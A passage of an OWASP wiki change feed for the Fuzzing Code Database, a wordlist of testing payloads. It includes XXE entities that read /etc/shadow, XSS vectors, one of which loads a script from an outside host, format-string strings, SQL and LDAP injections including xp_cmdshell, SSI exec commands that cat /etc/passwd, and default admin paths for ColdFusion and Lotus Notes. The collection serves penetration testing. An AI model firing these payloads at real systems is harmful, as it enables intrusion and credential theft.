&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////etc/shadow&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;?xml version=&amp;quot;&amp;quot;1.0&amp;quot;&amp;quot; encoding=&amp;quot;&amp;quot;ISO-8859-1&amp;quot;&amp;quot;?&amp;amp;gt;&amp;amp;lt;!DOCTYPE foo [&amp;amp;lt;!ELEMENT foo ANY&amp;amp;gt;&amp;amp;lt;!ENTITY xxe SYSTEM &amp;quot;&amp;quot;file:////dev/random&amp;quot;&amp;quot;&amp;amp;gt;]&amp;amp;gt;&amp;amp;lt;foo&amp;amp;gt;&amp;amp;amp;xxe;&amp;amp;lt;/foo&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;xml SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== Format String Statements - (Update: xx/xx/xx - Total Statements: 28) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;%s%p%x%d&lt;br /&gt;
.1024d&lt;br /&gt;
%.2049d&lt;br /&gt;
%p%p%p%p&lt;br /&gt;
%x%x%x%x&lt;br /&gt;
%d%d%d%d&lt;br /&gt;
%s%s%s%s&lt;br /&gt;
%99999999999s&lt;br /&gt;
%08x&lt;br /&gt;
%%20d&lt;br /&gt;
%%20n&lt;br /&gt;
%%20x&lt;br /&gt;
%%20s&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
%p%p%p%p%p%p%p%p%p%p&lt;br /&gt;
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%&lt;br /&gt;
f(x)=%s x 123&lt;br /&gt;
f(x)=%x x 255&lt;br /&gt;
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x&lt;br /&gt;
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s&lt;br /&gt;
XXXXX.%p&lt;br /&gt;
XXXXX`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`&lt;br /&gt;
`perl -e 'print &amp;quot;.%p&amp;quot; x 80'`%n&lt;br /&gt;
%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
XXX0_%08x.%08x.%08x.%08x.%08x\n&lt;br /&gt;
%.16705u%2\$hn&lt;br /&gt;
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|&lt;br /&gt;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id &amp;amp;gt; /tmp/file; exit;&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
==== Project Contributor  ====&lt;br /&gt;
&lt;br /&gt;
Project Leader: [[:User:Wagner.elias|'''Wagner Elias''']] &lt;br /&gt;
&lt;br /&gt;
Reviewer: [[:User:eneves|'''Eduardo Neves''']] &lt;br /&gt;
&lt;br /&gt;
Contributor: [[:User:ulisses.castro|'''Ulisses Castro''']] &lt;br /&gt;
&lt;br /&gt;
==== Feedback and Participation  ====&lt;br /&gt;
&lt;br /&gt;
We hope you find the Fuzzing Code Database useful. Please contribute to the Project by volunteering for one of the tasks, sending your comments, questions, and suggestions to wagner.elias |at| owasp.org &lt;br /&gt;
&lt;br /&gt;
==== Project Identification  ====&lt;br /&gt;
&lt;br /&gt;
{{Template:OWASP Project Identification Tab&lt;br /&gt;
| project_name = OWASP Fuzzing Code Database&lt;br /&gt;
| project_description = &lt;br /&gt;
| leader_name = Wagner Elias&lt;br /&gt;
| leader_email = &lt;br /&gt;
| leader_username = Wagner.elias&lt;br /&gt;
| maintainer_name = &lt;br /&gt;
| maintainer_email = &lt;br /&gt;
| maintainer_username = &lt;br /&gt;
| contributor_name1 = &lt;br /&gt;
| contributor_email1 = &lt;br /&gt;
| contributor_username1 = &lt;br /&gt;
| contributor_name2 = &lt;br /&gt;
| contributor_email2 = &lt;br /&gt;
| contributor_username2 = &lt;br /&gt;
| contributor_name3 = &lt;br /&gt;
| contributor_email3 = &lt;br /&gt;
| contributor_username3 = &lt;br /&gt;
| contributor_name4 = &lt;br /&gt;
| contributor_email4 = &lt;br /&gt;
| contributor_username4 = &lt;br /&gt;
| contributor_name5 = &lt;br /&gt;
| contributor_email5 = &lt;br /&gt;
| contributor_username5 = &lt;br /&gt;
| contributor_name6 = &lt;br /&gt;
| contributor_email6 = &lt;br /&gt;
| contributor_username6 = &lt;br /&gt;
| contributor_name7 = &lt;br /&gt;
| contributor_email7 = &lt;br /&gt;
| contributor_username7 = &lt;br /&gt;
| contributor_name8 = &lt;br /&gt;
| contributor_email8 = &lt;br /&gt;
| contributor_username8 = &lt;br /&gt;
| contributor_name9 = &lt;br /&gt;
| contributor_email9 = &lt;br /&gt;
| contributor_username9 = &lt;br /&gt;
| contributor_name10 = &lt;br /&gt;
| contributor_email10 = &lt;br /&gt;
| contributor_username10 =  &lt;br /&gt;
| pamphlet_link = &lt;br /&gt;
| mailing_list_name = owasp-fuzzing-code-database&lt;br /&gt;
| links_url1 = &lt;br /&gt;
| links_name1 = &lt;br /&gt;
| links_url2 = &lt;br /&gt;
| links_name2 = &lt;br /&gt;
| links_url3 = &lt;br /&gt;
| links_name3 = &lt;br /&gt;
| links_url4 = &lt;br /&gt;
| links_name4 = &lt;br /&gt;
| links_url5 = &lt;br /&gt;
| links_name5 = &lt;br /&gt;
| links_url6 = &lt;br /&gt;
| links_name6 = &lt;br /&gt;
| links_url7 = &lt;br /&gt;
| links_name7 = &lt;br /&gt;
| links_url8 = &lt;br /&gt;
| links_name8 = &lt;br /&gt;
| links_url9 = &lt;br /&gt;
| links_name9 = &lt;br /&gt;
| links_url10 = &lt;br /&gt;
| links_name10 = &lt;br /&gt;
| project_road_map =&lt;br /&gt;
| project_health_status = &lt;br /&gt;
| current_release_name = &lt;br /&gt;
| current_release_date = &lt;br /&gt;
| current_release_download_link = &lt;br /&gt;
| current_release_rating = &lt;br /&gt;
| current_release_leader_name = &lt;br /&gt;
| current_release_leader_email = &lt;br /&gt;
| current_release_leader_username = &lt;br /&gt;
| last_reviewed_release_name = &lt;br /&gt;
| last_reviewed_release_date = &lt;br /&gt;
| last_reviewed_release_download_link = &lt;br /&gt;
| last_reviewed_release_rating = &lt;br /&gt;
| last_reviewed_release_leader_name = &lt;br /&gt;
| last_reviewed_release_leader_email = &lt;br /&gt;
| last_reviewed_release_leader_username = &lt;br /&gt;
| old_release_name1 = &lt;br /&gt;
| old_release_date1 = &lt;br /&gt;
| old_release_download_link1 = &lt;br /&gt;
| old_release_name2 = &lt;br /&gt;
| old_release_date2 = &lt;br /&gt;
| old_release_download_link2 = &lt;br /&gt;
| old_release_name3 = &lt;br /&gt;
| old_release_date3 = &lt;br /&gt;
| old_release_download_link3 = &lt;br /&gt;
| old_release_name4 = &lt;br /&gt;
| old_release_date4 = &lt;br /&gt;
| old_release_download_link4 = &lt;br /&gt;
| old_release_name5 = &lt;br /&gt;
| old_release_date5 = &lt;br /&gt;
| old_release_download_link5 = &lt;br /&gt;
}} __NOTOC__ &amp;lt;headertabs /&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project|Fuzzing Code Database]] [[Category:OWASP_Document]] [[Category:OWASP_Alpha_Quality_Document]]&lt;/div&gt;</summary>
		<author><name>Adam.muntner</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80022</id>
		<title>Category:OWASP Fuzzing Code Database</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&amp;diff=80022"/>
				<updated>2010-03-17T01:50:43Z</updated>
		
		<summary type="html">&lt;p&gt;Adam.muntner: /* Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) = */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;This database is a collection of several statements used in code injection, fuzzing and brute-force aproach. All too often security professionals rely on their own repositories of statements collected from assessments they've conducted. These repositories are prone to being incomplete or outdated. We want to collect all these statements, merging the statements from several projects like [[WebScarab]], [[WebSlayer]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results. Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News  ====&lt;br /&gt;
&lt;br /&gt;
'''02 February 2010'''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category Lotus/Notes Files&lt;br /&gt;
&lt;br /&gt;
'''11 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Created new Category: XML Attacks&lt;br /&gt;
&lt;br /&gt;
''Update Statements'' &lt;br /&gt;
&lt;br /&gt;
*15 new XML Statements &lt;br /&gt;
*93 new SQL Injections Statements &lt;br /&gt;
*67 new Traversal Directory Statements &lt;br /&gt;
*Delete 33 XSS Statement Duplicate &lt;br /&gt;
*30 New XSS Statements&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009''' &lt;br /&gt;
&lt;br /&gt;
*Updated the objectives of the project.&lt;br /&gt;
&lt;br /&gt;
'''21 July 2009''' &lt;br /&gt;
&lt;br /&gt;
*Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals  ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP. &lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project: &lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project 2 - Browser 3 - Operational System 4 - Databases &lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned: &lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database. &lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation. &lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements. &lt;br /&gt;
&lt;br /&gt;
==== Statements  ====&lt;br /&gt;
&lt;br /&gt;
== Cold Fusion Default Files - (Update: 16 March 2009 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
&amp;quot;hi&amp;quot;&amp;quot;) or (&amp;quot;&amp;quot;a&amp;quot;&amp;quot;=&amp;quot;&amp;quot;a&amp;quot;&lt;br /&gt;
'hi' or 'x'='x';&lt;br /&gt;
@variable&lt;br /&gt;
,@variable&lt;br /&gt;
PRINT&lt;br /&gt;
PRINT @@variable&lt;br /&gt;
select&lt;br /&gt;
insert&lt;br /&gt;
as&lt;br /&gt;
or&lt;br /&gt;
procedure&lt;br /&gt;
limit&lt;br /&gt;
order by&lt;br /&gt;
asc&lt;br /&gt;
desc&lt;br /&gt;
delete&lt;br /&gt;
update&lt;br /&gt;
distinct&lt;br /&gt;
having&lt;br /&gt;
truncate&lt;br /&gt;
replace&lt;br /&gt;
like&lt;br /&gt;
handler&lt;br /&gt;
bfilename&lt;br /&gt;
' or username like '%&lt;br /&gt;
' or uname like '%&lt;br /&gt;
' or userid like '%&lt;br /&gt;
' or uid like '%&lt;br /&gt;
' or user like '%&lt;br /&gt;
exec xp&lt;br /&gt;
exec sp&lt;br /&gt;
'; exec master..xp_cmdshell&lt;br /&gt;
'; exec xp_regread&lt;br /&gt;
t'exec master..xp_cmdshell 'nslookup www.google.com'--&lt;br /&gt;
--sp_password&lt;br /&gt;
\x27UNION SELECT&lt;br /&gt;
' UNION SELECT&lt;br /&gt;
' UNION ALL SELECT&lt;br /&gt;
' or (EXISTS)&lt;br /&gt;
' (select top 1&lt;br /&gt;
'||UTL_HTTP.REQUEST&lt;br /&gt;
1;SELECT%20*&lt;br /&gt;
to_timestamp_tz&lt;br /&gt;
tz_offset&lt;br /&gt;
&amp;amp;lt;&amp;amp;gt;&amp;quot;'%;)(&amp;amp;amp;+&lt;br /&gt;
'%20or%201=1&lt;br /&gt;
%27%20or%201=1&lt;br /&gt;
%20$(sleep%2050)&lt;br /&gt;
%20'sleep%2050'&lt;br /&gt;
char%4039%41%2b%40SELECT&lt;br /&gt;
&amp;amp;amp;apos;%20OR&lt;br /&gt;
'sqlattempt1&lt;br /&gt;
(sqlattempt2)&lt;br /&gt;
|&lt;br /&gt;
%7C&lt;br /&gt;
*|&lt;br /&gt;
%2A%7C&lt;br /&gt;
*(|(mail=*))&lt;br /&gt;
%2A%28%7C%28mail%3D%2A%29%29&lt;br /&gt;
*(|(objectclass=*))&lt;br /&gt;
%2A%28%7C%28objectclass%3D%2A%29%29&lt;br /&gt;
(&lt;br /&gt;
%28&lt;br /&gt;
)&lt;br /&gt;
%29&lt;br /&gt;
&amp;amp;amp;&lt;br /&gt;
%26&lt;br /&gt;
!&lt;br /&gt;
%21&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
' or ''='&lt;br /&gt;
x' or 1=1 or 'x'='y&lt;br /&gt;
/&lt;br /&gt;
//&lt;br /&gt;
//*&lt;br /&gt;
*/*&lt;br /&gt;
a' or 3=3--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 3=3--&amp;quot;&lt;br /&gt;
' or 3=3&lt;br /&gt;
‘ or 3=3 --&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&amp;amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;amp;gt;&amp;amp;lt;br/&amp;amp;gt;&lt;br /&gt;
